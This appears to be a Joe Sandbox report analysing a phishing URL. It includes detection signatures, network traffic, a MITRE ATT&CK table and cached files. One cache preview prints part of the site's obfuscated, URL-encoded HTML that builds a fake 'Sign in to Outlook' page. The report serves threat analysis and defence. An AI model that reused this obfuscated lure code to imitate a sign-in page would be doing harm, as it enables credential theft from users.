Edit tour

Windows Analysis Report
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/

Overview

General Information

Sample URL:	https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/
Analysis ID:	1433035
Infos:

Detection

HTMLPhisher

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected HtmlPhish10

Yara detected HtmlPhish6

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

HTML body contains low number of good links

HTML body contains password input but no form action

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2024,i,4639364599846201149,15810019114583765564,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,12684436433674402731,16423869369872526570,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
dropped/chromecache_56	JoeSecurity_HtmlPhish_6	Yara detected HtmlPhish_6	Joe Security
dropped/chromecache_51	JoeSecurity_HtmlPhish_6	Yara detected HtmlPhish_6	Joe Security
dropped/chromecache_48	JoeSecurity_HtmlPhish_6	Yara detected HtmlPhish_6	Joe Security
dropped/chromecache_50	JoeSecurity_HtmlPhish_6	Yara detected HtmlPhish_6	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_6	Yara detected HtmlPhish_6	Joe Security
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTTP traffic detected: POST /report/v4?s=OgVX3jyPtvECmYZZTxn4CexlmRXxr9CIxEf1euhWvT9YFjfmC8EvOhJKMNxQ0HCVLxPZFe4L63mudhqivV6vRFcH8sxmxW1f8t9QxiG%2Bhl8t1Gx%2BU%2Fg2h679TnbyhtSzDEMpysiH HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 477Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 Apr 2024 23:11:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: Accept-Encodingx-turbo-charged-by: LiteSpeedCache-Control: max-age=31536000CF-Cache-Status: HITAge: 398395Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OgVX3jyPtvECmYZZTxn4CexlmRXxr9CIxEf1euhWvT9YFjfmC8EvOhJKMNxQ0HCVLxPZFe4L63mudhqivV6vRFcH8sxmxW1f8t9QxiG%2Bhl8t1Gx%2BU%2Fg2h679TnbyhtSzDEMpysiH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87babb93bc298105-ORD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 Apr 2024 23:11:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: Accept-Encodingx-turbo-charged-by: LiteSpeedCache-Control: max-age=31536000CF-Cache-Status: HITAge: 398412Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNZvdN2PmFph2g5zCYD%2BUdT5nsiJQKyxzu%2FbuMUUbcaKhlSUKSZRRNz2BCp0mWXTGlxFirGx6BgOVPBIXxNV5E6hd3iW2o6rtU44vTFDqKNO%2Bc7hPNttF1b1GWvznt69TAlSq5Ig"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87babc008ca92da6-ORD

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 23.11.208.106:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.11.208.106:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49772 version: TLS 1.2

Source: classification engine

Classification label: mal96.phis.win@23/17@12/7

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2024,i,4639364599846201149,15810019114583765564,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,12684436433674402731,16423869369872526570,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2024,i,4639364599846201149,15810019114583765564,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,12684436433674402731,16423869369872526570,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/	100%	Avira URL Cloud	phishing
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/	23%	Virustotal		Browse
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.linkpicture.com	0%	Virustotal	Browse
vbvfdvdjvv.fyfyvfytvghv.workers.dev	23%	Virustotal	Browse
part-0023.t-0009.t-msedge.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/favicon.ico	100%	Avira URL Cloud	phishing
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/style.css	100%	Avira URL Cloud	phishing
https://www.linkpicture.com/q/Screen-Shot-2022-01-30-at-10.27.21-PM.png	0%	Avira URL Cloud	safe
https://www.linkpicture.com/q/Screen-Shot-2022-01-30-at-10.27.21-PM.png	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false		high
vbvfdvdjvv.fyfyvfytvghv.workers.dev	104.21.55.4	true	false	23%, Virustotal, Browse	unknown
www.google.com	142.250.191.196	true	false		high
part-0023.t-0009.t-msedge.net	13.107.246.51	true	false	0%, Virustotal, Browse	unknown
www.linkpicture.com	104.21.235.181	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGJCvu7EGIjAVFeFXZ3cxMO0krL__GxSD10I8mSsWmyN1j1S6OFdhtkIYAXNkOrF93XGZRsvJ13AyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/style.css	false	Avira URL Cloud: phishing	unknown
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/favicon.ico	false	Avira URL Cloud: phishing	unknown
https://www.google.com/async/newtab_promos	false		high
https://a.nel.cloudflare.com/report/v4?s=dNZvdN2PmFph2g5zCYD%2BUdT5nsiJQKyxzu%2FbuMUUbcaKhlSUKSZRRNz2BCp0mWXTGlxFirGx6BgOVPBIXxNV5E6hd3iW2o6rtU44vTFDqKNO%2Bc7hPNttF1b1GWvznt69TAlSq5Ig	false		high
https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/	true		unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://www.linkpicture.com/q/Screen-Shot-2022-01-30-at-10.27.21-PM.png	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGJCvu7EGIjDMSzESXqZsVuec-K5gSL0dyPdiFMcnhBa2SK6Q33b-OjeLxfU0N_Vj-xNo_exqK2MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.55.4	vbvfdvdjvv.fyfyvfytvghv.workers.dev	United States	13335	CLOUDFLARENETUS	false
13.107.246.51	part-0023.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.21.235.181	www.linkpicture.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
142.250.191.196	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1433035
Start date and time:	2024-04-29 01:10:19 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.phis.win@23/17@12/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.1.99, 142.250.190.46, 142.251.166.84, 34.104.35.123, 199.232.210.172, 192.229.211.108, 142.250.191.170, 172.217.5.10, 142.250.191.138, 172.217.0.170, 142.250.191.234, 142.250.191.202, 142.250.191.106, 142.250.190.131, 142.250.190.14
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 47

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	downloaded
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 48

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (9333)
Category:	downloaded
Size (bytes):	9370
Entropy (8bit):	4.209832303509634
Encrypted:	false
SSDEEP:	96:iaQS4kPs08TnWJWAr6KtLnLCZLUZ1JTaZyGe66fSgHcMg1ogZz9ZZgEE27y:iaQE2dSPKyGe66fSU91GzZgEE27y
MD5:	BC9F952D3BF2E01B16B102DC2A08599C
SHA1:	53806858687DCECA13E2947491179C0D6B645B88
SHA-256:	2E8854ADA65907277BFA7C58999411DE3913E94A9D763552D6E59177F2E99E31
SHA-512:	D917FCC65AF30003D772D7A3DAE07D94E78E425203910E638AB8D4293891751CF3D055CD5C23B456BE837A4402C4A5A0B080068E15B2FC629572B4D08BF4ADCB
Malicious:	false
Reputation:	low
URL:	https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/style.css
Preview:	. <<script>. .document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%20%20%20%20%3Ctitle%3ESign%20in%20to%20Outlook%3C/title%3E%0A%20%20%20%20%3Clink%20href%3D%22style.css%22%20rel%3D%22stylesheet%22%20type%3D%22text/css%22%20/%3E%0A%20%20%20%20%3Cstyle%3E%0A%20%20%20%20%20%20body%7B%0A%20%20background%3A%20url%28%27https%3A//www.linkpicture.com/q/Screen-Shot-2022-01-30-at-10.27.21-PM.png%27%29%3B%0A%20%20padding%3A%200%3B%0A%20%20margin%3A%200%3B%0A%20%20background-size%3A%20cover%3B%0A%20%20font-family%3A%20Arial%2C%20Helvetica%2C%20sans-serif%3B%0A%7D%0A%0A.formal%20input%7B%0A%20%20border%3A%20none%3B%0A%20%20border-bottom%3A%201px%20solid%20%23999%3B%0A%20%20width%3A%20100%25%3B%0A%20%20padding%3A%205px%3B%0A%20%20font-size%3A%2016px%3B%0A%20%20outline%3A%20none%3B%0A%7D%0A.formal%7B%0A%20%20background%3A%20%23ff

Chrome Cache Entry: 49

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (759)
Category:	downloaded
Size (bytes):	764
Entropy (8bit):	5.1717173615287315
Encrypted:	false
SSDEEP:	12:uXCXnpW6oTG3OFl/s9t9hgBHslriFTAYsSw7sZAnIIIIIII5wurPXpwuGHHHHHHp:p5VoSeH/KtgBHslgT9lCuABur67HHHHp
MD5:	4E4981EF6CDEAB53FEBAE633A5A7B35A
SHA1:	51F7AB31FA2C354AB0B3BD847CDFD0F71149EBAC
SHA-256:	C978BE4F38A94E3AE71AD64A87317D0C02B05FEBFB41907A6B3A5366CEAF2AAB
SHA-512:	7435671D0F0BCD8B9298FB6A9CC5B92C1473518605883F765533B541D2123591BF495C8A9ED5E288CED935CD8EA41415332E410A4B52BAEAB1F870DA73F4D5EE
Malicious:	false
Reputation:	low
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["frank csorba death","powerball lottery numbers","wwe smackdown draft picks","pve escape from tarkov","nba knicks 76ers","spacex falcon 9 rocket launch today","coc mysterious objects","prime energy drink"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1256,1255,1254,1253,1252,1251,1250,1200],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 50

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (9333)
Category:	dropped
Size (bytes):	9370
Entropy (8bit):	4.209832303509634
Encrypted:	false
SSDEEP:	96:iaQS4kPs08TnWJWAr6KtLnLCZLUZ1JTaZyGe66fSgHcMg1ogZz9ZZgEE27y:iaQE2dSPKyGe66fSU91GzZgEE27y
MD5:	BC9F952D3BF2E01B16B102DC2A08599C
SHA1:	53806858687DCECA13E2947491179C0D6B645B88
SHA-256:	2E8854ADA65907277BFA7C58999411DE3913E94A9D763552D6E59177F2E99E31
SHA-512:	D917FCC65AF30003D772D7A3DAE07D94E78E425203910E638AB8D4293891751CF3D055CD5C23B456BE837A4402C4A5A0B080068E15B2FC629572B4D08BF4ADCB
Malicious:	false
Reputation:	low
